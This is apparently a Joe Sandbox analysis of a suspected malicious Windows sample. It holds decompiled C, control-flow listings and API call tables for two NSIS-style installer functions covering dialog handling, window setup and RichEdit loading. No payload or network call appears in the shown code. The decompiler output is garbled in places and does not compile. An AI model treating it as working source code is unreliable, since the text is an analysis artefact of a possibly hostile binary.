241->244 245 4040af-4040b4 241->245 243->214 248 4040ea-4040fa SendMessageW 244->248 249 4040ab-4040ad 244->249 245->248 250 4040b6-4040bc 245->250 248->214 249->243 254 4040d3-4040dc call 40140b 250->254 255 4040be-4040c4 call 40140b 250->255 254->214 263 4040de-4040e8 254->263 264 4040ca 255->264 263->264 264->243 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->213 286 404339-40433b 275->286 286->213 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->225 290 40437e-4043ab CreateDialogParamW 288->290 289->212 291 404353-404359 289->291 290->225 292 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 290->292 291->213 293 40435f 291->293 292->212 298 40440a-40441d ShowWindow call 4044e5 292->298 293->212 300 404422 298->300 300->225
                                  C-Code - Quality: 84%
                                  			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                  				struct HWND__* _v28;
                                  				void* _v84;
                                  				void* _v88;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t34;
                                  				signed int _t36;
                                  				signed int _t38;
                                  				struct HWND__* _t48;
                                  				signed int _t67;
                                  				struct HWND__* _t73;
                                  				signed int _t86;
                                  				struct HWND__* _t91;
                                  				signed int _t99;
                                  				int _t103;
                                  				signed int _t117;
                                  				int _t118;
                                  				int _t122;
                                  				signed int _t124;
                                  				struct HWND__* _t127;
                                  				struct HWND__* _t128;
                                  				int _t129;
                                  				intOrPtr _t130;
                                  				long _t133;
                                  				int _t135;
                                  				int _t136;
                                  				void* _t137;
                                  				void* _t146;
                                  
                                  				_t130 = _a8;
                                  				if(_t130 == 0x110 || _t130 == 0x408) {
                                  					_t34 = _a12;
                                  					_t127 = _a4;
                                  					__eflags = _t130 - 0x110;
                                  					 *0x42d250 = _t34;
                                  					if(_t130 == 0x110) {
                                  						 *0x434f08 = _t127;
                                  						 *0x42d264 = GetDlgItem(_t127, 1);
                                  						_t91 = GetDlgItem(_t127, 2);
                                  						_push(0xffffffff);
                                  						_push(0x1c);
                                  						 *0x42b230 = _t91;
                                  						E00404499(_t127);
                                  						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8); // executed
                                  						 *0x433ecc = E0040140B(4);
                                  						_t34 = 1;
                                  						__eflags = 1;
                                  						 *0x42d250 = 1;
                                  					}
                                  					_t124 =  *0x40a368; // 0x0
                                  					_t136 = 0;
                                  					_t133 = (_t124 << 6) +  *0x434f20;
                                  					__eflags = _t124;
                                  					if(_t124 < 0) {
                                  						L36:
                                  						E004044E5(0x40b);
                                  						while(1) {
                                  							_t36 =  *0x42d250;
                                  							 *0x40a368 =  *0x40a368 + _t36;
                                  							_t133 = _t133 + (_t36 << 6);
                                  							_t38 =  *0x40a368; // 0x0
                                  							__eflags = _t38 -  *0x434f24;
                                  							if(_t38 ==  *0x434f24) {
                                  								E0040140B(1);
                                  							}
                                  							__eflags =  *0x433ecc - _t136; // 0x0
                                  							if(__eflags != 0) {
                                  								break;
                                  							}
                                  							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                  							if(__eflags >= 0) {
                                  								break;
                                  							}
                                  							_t117 =  *(_t133 + 0x14);
                                  							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                  							_push( *((intOrPtr*)(_t133 + 0x20)));
                                  							_push(0xfffffc19);
                                  							E00404499(_t127);
                                  							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                  							_push(0xfffffc1b);
                                  							E00404499(_t127);
                                  							_push( *((intOrPtr*)(_t133 + 0x28)));
                                  							_push(0xfffffc1a);
                                  							E00404499(_t127);
                                  							_t48 = GetDlgItem(_t127, 3);
                                  							__eflags =  *0x434f8c - _t136;
                                  							_v28 = _t48;
                                  							if( *0x434f8c != _t136) {
                                  								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                  								__eflags = _t117;
                                  							}
                                  							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                  							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                  							E004044BB(_t117 & 0x00000002);
                                  							_t118 = _t117 & 0x00000004;
                                  							EnableWindow( *0x42b230, _t118);
                                  							__eflags = _t118 - _t136;
                                  							if(_t118 == _t136) {
                                  								_push(1);
                                  							} else {
                                  								_push(_t136);
                                  							}
                                  							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                  							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                  							__eflags =  *0x434f8c - _t136;
                                  							if( *0x434f8c == _t136) {
                                  								_push( *0x42d264);
                                  							} else {
                                  								SendMessageW(_t127, 0x401, 2, _t136);
                                  								_push( *0x42b230);
                                  							}
                                  							E004044CE();
                                  							E0040653D(0x42d268, E00403F7B());
                                  							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                  							SetWindowTextW(_t127, 0x42d268); // executed
                                  							_push(_t136);
                                  							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                  							__eflags = _t67;
                                  							if(_t67 != 0) {
                                  								continue;
                                  							} else {
                                  								__eflags =  *_t133 - _t136;
                                  								if( *_t133 == _t136) {
                                  									continue;
                                  								}
                                  								__eflags =  *(_t133 + 4) - 5;
                                  								if( *(_t133 + 4) != 5) {
                                  									DestroyWindow( *0x433ed8); // executed
                                  									 *0x42c240 = _t133;
                                  									__eflags =  *_t133 - _t136;
                                  									if( *_t133 <= _t136) {
                                  										goto L60;
                                  									}
                                  									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                  									__eflags = _t73 - _t136;
                                  									 *0x433ed8 = _t73;
                                  									if(_t73 == _t136) {
                                  										goto L60;
                                  									}
                                  									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                  									_push(6);
                                  									E00404499(_t73);
                                  									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                  									ScreenToClient(_t127, _t137 + 0x10);
                                  									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                  									_push(_t136);
                                  									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                  									__eflags =  *0x433ecc - _t136; // 0x0
                                  									if(__eflags != 0) {
                                  										goto L63;
                                  									}
                                  									ShowWindow( *0x433ed8, 8); // executed
                                  									E004044E5(0x405);
                                  									goto L60;
                                  								}
                                  								__eflags =  *0x434f8c - _t136;
                                  								if( *0x434f8c != _t136) {
                                  									goto L63;
                                  								}
                                  								__eflags =  *0x434f80 - _t136;
                                  								if( *0x434f80 != _t136) {
                                  									continue;
                                  								}
                                  								goto L63;
                                  							}
                                  						}
                                  						DestroyWindow( *0x433ed8);
                                  						 *0x434f08 = _t136;
                                  						EndDialog(_t127,  *0x42ba38);
                                  						goto L60;
                                  					} else {
                                  						__eflags = _t34 - 1;
                                  						if(_t34 != 1) {
                                  							L35:
                                  							__eflags =  *_t133 - _t136;
                                  							if( *_t133 == _t136) {
                                  								goto L63;
                                  							}
                                  							goto L36;
                                  						}
                                  						_push(0);
                                  						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                  						__eflags = _t86;
                                  						if(_t86 == 0) {
                                  							goto L35;
                                  						}
                                  						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                  						__eflags =  *0x433ecc - _t136; // 0x0
                                  						return 0 | __eflags == 0x00000000;
                                  					}
                                  				} else {
                                  					_t127 = _a4;
                                  					_t136 = 0;
                                  					if(_t130 == 0x47) {
                                  						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                  					}
                                  					_t122 = _a12;
                                  					if(_t130 != 5) {
                                  						L8:
                                  						if(_t130 != 0x40d) {
                                  							__eflags = _t130 - 0x11;
                                  							if(_t130 != 0x11) {
                                  								__eflags = _t130 - 0x111;
                                  								if(_t130 != 0x111) {
                                  									L28:
                                  									return E00404500(_a8, _t122, _a16);
                                  								}
                                  								_t135 = _t122 & 0x0000ffff;
                                  								_t128 = GetDlgItem(_t127, _t135);
                                  								__eflags = _t128 - _t136;
                                  								if(_t128 == _t136) {
                                  									L15:
                                  									__eflags = _t135 - 1;
                                  									if(_t135 != 1) {
                                  										__eflags = _t135 - 3;
                                  										if(_t135 != 3) {
                                  											_t129 = 2;
                                  											__eflags = _t135 - _t129;
                                  											if(_t135 != _t129) {
                                  												L27:
                                  												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                  												goto L28;
                                  											}
                                  											__eflags =  *0x434f8c - _t136;
                                  											if( *0x434f8c == _t136) {
                                  												_t99 = E0040140B(3);
                                  												__eflags = _t99;
                                  												if(_t99 != 0) {
                                  													goto L28;
                                  												}
                                  												 *0x42ba38 = 1;
                                  												L23:
                                  												_push(0x78);
                                  												L24:
                                  												E00404472();
                                  												goto L28;
                                  											}
                                  											E0040140B(_t129);
                                  											 *0x42ba38 = _t129;
                                  											goto L23;
                                  										}
                                  										__eflags =  *0x40a368 - _t136; // 0x0
                                  										if(__eflags <= 0) {
                                  											goto L27;
                                  										}
                                  										_push(0xffffffff);
                                  										goto L24;
                                  									}
                                  									_push(_t135);
                                  									goto L24;
                                  								}
                                  								SendMessageW(_t128, 0xf3, _t136, _t136);
                                  								_t103 = IsWindowEnabled(_t128);
                                  								__eflags = _t103;
                                  								if(_t103 == 0) {
                                  									L63:
                                  									return 0;
                                  								}
                                  								goto L15;
                                  							}
                                  							SetWindowLongW(_t127, _t136, _t136);
                                  							return 1;
                                  						}
                                  						DestroyWindow( *0x433ed8);
                                  						 *0x433ed8 = _t122;
                                  						L60:
                                  						if( *0x42f268 == _t136) {
                                  							_t146 =  *0x433ed8 - _t136; // 0x103e2
                                  							if(_t146 != 0) {
                                  								ShowWindow(_t127, 0xa); // executed
                                  								 *0x42f268 = 1;
                                  							}
                                  						}
                                  						goto L63;
                                  					}
                                  					asm("sbb eax, eax");
                                  					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                  					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                  						goto L28;
                                  					} else {
                                  						ShowWindow(_t127, 4);
                                  						goto L8;
                                  					}
                                  				}
                                  			}
































                                  0x00403fa5
                                  0x00403fac
                                  0x00404113
                                  0x00404117
                                  0x0040411b
                                  0x0040411d
                                  0x00404122
                                  0x0040412d
                                  0x00404138
                                  0x0040413d
                                  0x0040413f
                                  0x00404141
                                  0x00404144
                                  0x00404149
                                  0x00404157
                                  0x00404164
                                  0x0040416b
                                  0x0040416b
                                  0x0040416c
                                  0x0040416c
                                  0x00404171
                                  0x00404177
                                  0x0040417e
                                  0x00404184
                                  0x00404186
                                  0x004041c6
                                  0x004041cb
                                  0x004041d0
                                  0x004041d0
                                  0x004041d5
                                  0x004041de
                                  0x004041e0
                                  0x004041e5
                                  0x004041eb
                                  0x004041ef
                                  0x004041ef
                                  0x004041f4
                                  0x004041fa
                                  0x00000000
                                  0x00000000
                                  0x00404205
                                  0x0040420b
                                  0x00000000
                                  0x00000000
                                  0x00404214
                                  0x0040421c
                                  0x00404221
                                  0x00404224
                                  0x0040422a
                                  0x0040422f
                                  0x00404232
                                  0x00404238
                                  0x0040423d
                                  0x00404240
                                  0x00404246
                                  0x0040424e
                                  0x00404254
                                  0x0040425a
                                  0x0040425e
                                  0x00404265
                                  0x00404265
                                  0x00404265
                                  0x0040426f
                                  0x00404281
                                  0x0040428d
                                  0x00404292
                                  0x0040429c
                                  0x004042a2
                                  0x004042a4
                                  0x004042a9
                                  0x004042a6
                                  0x004042a6
                                  0x004042a6
                                  0x004042b9
                                  0x004042d1
                                  0x004042d3
                                  0x004042d9
                                  0x004042ee
                                  0x004042db
                                  0x004042e4
                                  0x004042e6
                                  0x004042e6
                                  0x004042f4
                                  0x00404305
                                  0x0040431b
                                  0x00404322
                                  0x00404328
                                  0x0040432c
                                  0x00404331
                                  0x00404333
                                  0x00000000
                                  0x00404339
                                  0x00404339
                                  0x0040433b
                                  0x00000000
                                  0x00000000
                                  0x00404341
                                  0x00404345
                                  0x0040436a
                                  0x00404370
                                  0x00404376
                                  0x00404378
                                  0x00000000
                                  0x00000000
                                  0x0040439e
                                  0x004043a4
                                  0x004043a6
                                  0x004043ab
                                  0x00000000
                                  0x00000000
                                  0x004043b1
                                  0x004043b4
                                  0x004043b7
                                  0x004043ce
                                  0x004043da
                                  0x004043f3
                                  0x004043f9
                                  0x004043fd
                                  0x00404402
                                  0x00404408
                                  0x00000000
                                  0x00000000
                                  0x00404412
                                  0x0040441d
                                  0x00000000
                                  0x0040441d
                                  0x00404347
                                  0x0040434d
                                  0x00000000
                                  0x00000000
                                  0x00404353
                                  0x00404359
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040435f
                                  0x00404333
                                  0x0040442a
                                  0x00404436
                                  0x0040443d
                                  0x00000000
                                  0x00404188
                                  0x00404188
                                  0x0040418b
                                  0x004041be
                                  0x004041be
                                  0x004041c0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004041c0
                                  0x0040418d
                                  0x00404191
                                  0x00404196
                                  0x00404198
                                  0x00000000
                                  0x00000000
                                  0x004041a8
                                  0x004041b0
                                  0x00000000
                                  0x004041b6
                                  0x00403fbe
                                  0x00403fbe
                                  0x00403fc2
                                  0x00403fc7
                                  0x00403fd6
                                  0x00403fd6
                                  0x00403fdc
                                  0x00403fe3
                                  0x00404027
                                  0x0040402d
                                  0x00404046
                                  0x00404049
                                  0x0040405c
                                  0x00404062
                                  0x00404100
                                  0x00000000
                                  0x00404109
                                  0x00404068
                                  0x00404073
                                  0x00404075
                                  0x00404077
                                  0x00404096
                                  0x00404096
                                  0x00404099
                                  0x0040409e
                                  0x004040a1
                                  0x004040b1
                                  0x004040b2
                                  0x004040b4
                                  0x004040ea
                                  0x004040fa
                                  0x00000000
                                  0x004040fa
                                  0x004040b6
                                  0x004040bc
                                  0x004040d5
                                  0x004040da
                                  0x004040dc
                                  0x00000000
                                  0x00000000
                                  0x004040de
                                  0x004040ca
                                  0x004040ca
                                  0x004040cc
                                  0x004040cc
                                  0x00000000
                                  0x004040cc
                                  0x004040bf
                                  0x004040c4
                                  0x00000000
                                  0x004040c4
                                  0x004040a3
                                  0x004040a9
                                  0x00000000
                                  0x00000000
                                  0x004040ab
                                  0x00000000
                                  0x004040ab
                                  0x0040409b
                                  0x00000000
                                  0x0040409b
                                  0x00404081
                                  0x00404088
                                  0x0040408e
                                  0x00404090
                                  0x00404466
                                  0x00000000
                                  0x00404466
                                  0x00000000
                                  0x00404090
                                  0x0040404e
                                  0x00000000
                                  0x00404056
                                  0x00404035
                                  0x0040403b
                                  0x00404443
                                  0x00404449
                                  0x0040444b
                                  0x00404451
                                  0x00404456
                                  0x0040445c
                                  0x0040445c
                                  0x00404451
                                  0x00000000
                                  0x00404449
                                  0x00403fea
                                  0x00403ff6
                                  0x00403fff
                                  0x00000000
                                  0x0040401e
                                  0x00404021
                                  0x00000000
                                  0x00404021
                                  0x00403fff

                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                  • ShowWindow.USER32(?), ref: 00403FF6
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                  • ShowWindow.USER32(?,00000004), ref: 00404021
                                  • DestroyWindow.USER32 ref: 00404035
                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                  • GetDlgItem.USER32 ref: 0040406D
                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                  • IsWindowEnabled.USER32(00000000), ref: 00404088
                                  • GetDlgItem.USER32 ref: 00404133
                                  • GetDlgItem.USER32 ref: 0040413D
                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404157
                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                  • GetDlgItem.USER32 ref: 0040424E
                                  • ShowWindow.USER32(00000000,?), ref: 0040426F
                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                  • EnableWindow.USER32(?,?), ref: 0040429C
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                  • EnableMenuItem.USER32 ref: 004042B9
                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                  • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                  • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                  • ShowWindow.USER32(?,0000000A), ref: 00404456
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                  • String ID:
                                  • API String ID: 3618520773-0
                                  • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                  • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                  • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                  • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 313 403c72-403c9b call 403ec2 call 405f14 304->313 309 403c51-403c62 call 40640b 305->309 310 403c67-403c6d lstrcatW 305->310 309->310 310->313 319 403ca1-403ca6 313->319 320 403d2d-403d35 call 405f14 313->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 330 403cd6-403cda 321->330 328 403de9-403df1 call 40140b 326->328 329 403d6a-403d9a RegisterClassW 326->329 327->326 344 403df3-403df6 328->344 345 403dfb-403e06 call 403ec2 328->345 332 403da0-403de4 SystemParametersInfoW CreateWindowExW 329->332 333 403eb8 329->333 335 403cec-403cf8 lstrlenW 330->335 336 403cdc-403ce9 call 405e39 330->336 332->328 337 403eba-403ec1 333->337 338 403d20-403d28 call 405e0c call 40653d 335->338 339 403cfa-403d08 lstrcmpiW 335->339 336->335 338->320 339->338 343 403d0a-403d14 GetFileAttributesW 339->343 347 403d16-403d18 343->347 348 403d1a-403d1b call 405e58 343->348 344->337 354 403e0c-403e26 ShowWindow call 40689a 345->354 355 403e8f-403e90 call 405672 345->355 347->338 347->348 348->338 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->333 361->344 366 403ea5-403eac call 40140b 361->366 364 403e46-403e56 GetClassInfoW RegisterClassW 362->364 365 403e5c-403e7f DialogBoxParamW call 40140b 362->365 363->362 364->365 371 403e84-403e8d call 403b3c 365->371 366->344 371->337
                                  C-Code - Quality: 96%
                                  			E00403BEC(void* __eflags) {
                                  				intOrPtr _v4;
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				void _v16;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr* _t22;
                                  				void* _t30;
                                  				void* _t32;
                                  				int _t33;
                                  				void* _t36;
                                  				int _t39;
                                  				int _t40;
                                  				intOrPtr _t41;
                                  				int _t44;
                                  				short _t63;
                                  				WCHAR* _t65;
                                  				signed char _t69;
                                  				WCHAR* _t76;
                                  				intOrPtr _t82;
                                  				WCHAR* _t87;
                                  
                                  				_t82 =  *0x434f10;
                                  				_t22 = E0040690A(2);
                                  				_t90 = _t22;
                                  				if(_t22 == 0) {
                                  					_t76 = 0x42d268;
                                  					L"1033" = 0x30;
                                  					 *0x442002 = 0x78;
                                  					 *0x442004 = 0;
                                  					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                  					__eflags =  *0x42d268;
                                  					if(__eflags == 0) {
                                  						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                  					}
                                  					lstrcatW(L"1033", _t76);
                                  				} else {
                                  					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                  				}
                                  				E00403EC2(_t78, _t90);
                                  				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
                                  				 *0x434f80 =  *0x434f18 & 0x00000020;
                                  				 *0x434f9c = 0x10000;
                                  				if(E00405F14(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                                  					L16:
                                  					if(E00405F14(_t98, _t86) == 0) {
                                  						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                  					}
                                  					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                                  					 *0x433ee8 = _t30;
                                  					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                  						L21:
                                  						if(E0040140B(0) == 0) {
                                  							_t32 = E00403EC2(_t78, __eflags);
                                  							__eflags =  *0x434fa0;
                                  							if( *0x434fa0 != 0) {
                                  								_t33 = E00405672(_t32, 0);
                                  								__eflags = _t33;
                                  								if(_t33 == 0) {
                                  									E0040140B(1);
                                  									goto L33;
                                  								}
                                  								__eflags =  *0x433ecc; // 0x0
                                  								if(__eflags == 0) {
                                  									E0040140B(2);
                                  								}
                                  								goto L22;
                                  							}
                                  							ShowWindow( *0x42d248, 5); // executed
                                  							_t39 = E0040689A("RichEd20"); // executed
                                  							__eflags = _t39;
                                  							if(_t39 == 0) {
                                  								E0040689A("RichEd32");
                                  							}
                                  							_t87 = L"RichEdit20W";
                                  							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                  							__eflags = _t40;
                                  							if(_t40 == 0) {
                                  								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                  								 *0x433ec4 = _t87;
                                  								RegisterClassW(0x433ea0);
                                  							}
                                  							_t41 =  *0x433ee0; // 0x0
                                  							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                  							E00403B3C(E0040140B(5), 1);
                                  							return _t44;
                                  						}
                                  						L22:
                                  						_t36 = 2;
                                  						return _t36;
                                  					} else {
                                  						_t78 =  *0x434f00;
                                  						 *0x433ea4 = E00401000;
                                  						 *0x433eb0 =  *0x434f00;
                                  						 *0x433eb4 = _t30;
                                  						 *0x433ec4 = 0x40a380;
                                  						if(RegisterClassW(0x433ea0) == 0) {
                                  							L33:
                                  							__eflags = 0;
                                  							return 0;
                                  						}
                                  						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                  						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                  						goto L21;
                                  					}
                                  				} else {
                                  					_t78 =  *(_t82 + 0x48);
                                  					_t92 = _t78;
                                  					if(_t78 == 0) {
                                  						goto L16;
                                  					}
                                  					_t76 = 0x432ea0;
                                  					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                  					_t63 =  *0x432ea0; // 0x43
                                  					if(_t63 == 0) {
                                  						goto L16;
                                  					}
                                  					if(_t63 == 0x22) {
                                  						_t76 = 0x432ea2;
                                  						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                  					}
                                  					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                  					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                  						L15:
                                  						E0040653D(_t86, E00405E0C(_t76));
                                  						goto L16;
                                  					} else {
                                  						_t69 = GetFileAttributesW(_t76);
                                  						if(_t69 == 0xffffffff) {
                                  							L14:
                                  							E00405E58(_t76);
                                  							goto L15;
                                  						}
                                  						_t98 = _t69 & 0x00000010;
                                  						if((_t69 & 0x00000010) != 0) {
                                  							goto L15;
                                  						}
                                  						goto L14;
                                  					}
                                  				}
                                  			}

























                                  0x00403bf2
                                  0x00403bfb
                                  0x00403c02
                                  0x00403c04
                                  0x00403c18
                                  0x00403c2a
                                  0x00403c33
                                  0x00403c3c
                                  0x00403c43
                                  0x00403c48
                                  0x00403c4f
                                  0x00403c62
                                  0x00403c62
                                  0x00403c6d
                                  0x00403c06
                                  0x00403c11
                                  0x00403c11
                                  0x00403c72
                                  0x00403c7c
                                  0x00403c85
                                  0x00403c8a
                                  0x00403c9b
                                  0x00403d2d
                                  0x00403d35
                                  0x00403d3e
                                  0x00403d3e
                                  0x00403d54
                                  0x00403d5a
                                  0x00403d68
                                  0x00403de9
                                  0x00403df1
                                  0x00403dfb
                                  0x00403e00
                                  0x00403e06
                                  0x00403e90
                                  0x00403e95
                                  0x00403e97
                                  0x00403eb3
                                  0x00000000
                                  0x00403eb3
                                  0x00403e99
                                  0x00403e9f
                                  0x00403ea7
                                  0x00403ea7
                                  0x00000000
                                  0x00403e9f
                                  0x00403e14
                                  0x00403e1f
                                  0x00403e24
                                  0x00403e26
                                  0x00403e2d
                                  0x00403e2d
                                  0x00403e38
                                  0x00403e40
                                  0x00403e42
                                  0x00403e44
                                  0x00403e4d
                                  0x00403e50
                                  0x00403e56
                                  0x00403e56
                                  0x00403e5c
                                  0x00403e75
                                  0x00403e86
                                  0x00000000
                                  0x00403e8b
                                  0x00403df3
                                  0x00403df5
                                  0x00000000
                                  0x00403d6a
                                  0x00403d6a
                                  0x00403d76
                                  0x00403d80
                                  0x00403d86
                                  0x00403d8b
                                  0x00403d9a
                                  0x00403eb8
                                  0x00403eb8
                                  0x00000000
                                  0x00403eb8
                                  0x00403da9
                                  0x00403de4
                                  0x00000000
                                  0x00403de4
                                  0x00403ca1
                                  0x00403ca1
                                  0x00403ca4
                                  0x00403ca6
                                  0x00000000
                                  0x00000000
                                  0x00403cb4
                                  0x00403cc6
                                  0x00403ccb
                                  0x00403cd4
                                  0x00000000
                                  0x00000000
                                  0x00403cda
                                  0x00403cdc
                                  0x00403ce9
                                  0x00403ce9
                                  0x00403cf2
                                  0x00403cf8
                                  0x00403d20
                                  0x00403d28
                                  0x00000000
                                  0x00403d0a
                                  0x00403d0b
                                  0x00403d14
                                  0x00403d1a
                                  0x00403d1b
                                  0x00000000
                                  0x00403d1b
                                  0x00403d16
                                  0x00403d18
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403d18
                                  0x00403cf8

                                  APIs
                                    • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                    • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                  • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76CDFAA0), ref: 00403CED
                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                  • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                  • LoadImageW.USER32 ref: 00403D54
                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                  • RegisterClassW.USER32 ref: 00403D91
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                  • CreateWindowExW.USER32 ref: 00403DDE
                                  • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                  • GetClassInfoW.USER32 ref: 00403E40
